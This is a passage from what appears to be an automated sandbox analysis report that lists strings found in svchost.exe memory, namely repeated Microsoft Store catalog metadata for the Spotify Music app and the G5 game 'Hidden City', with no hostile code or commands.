music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z\|\|.\|\|18ebec36-1675-40c0-a5d4-25e9e774360f\|\|1152921505692410033\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z\|\|.\|\|18ebec36-1675-40c0-a5d4-25e9e774360f\|\|1152921505692410033\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName

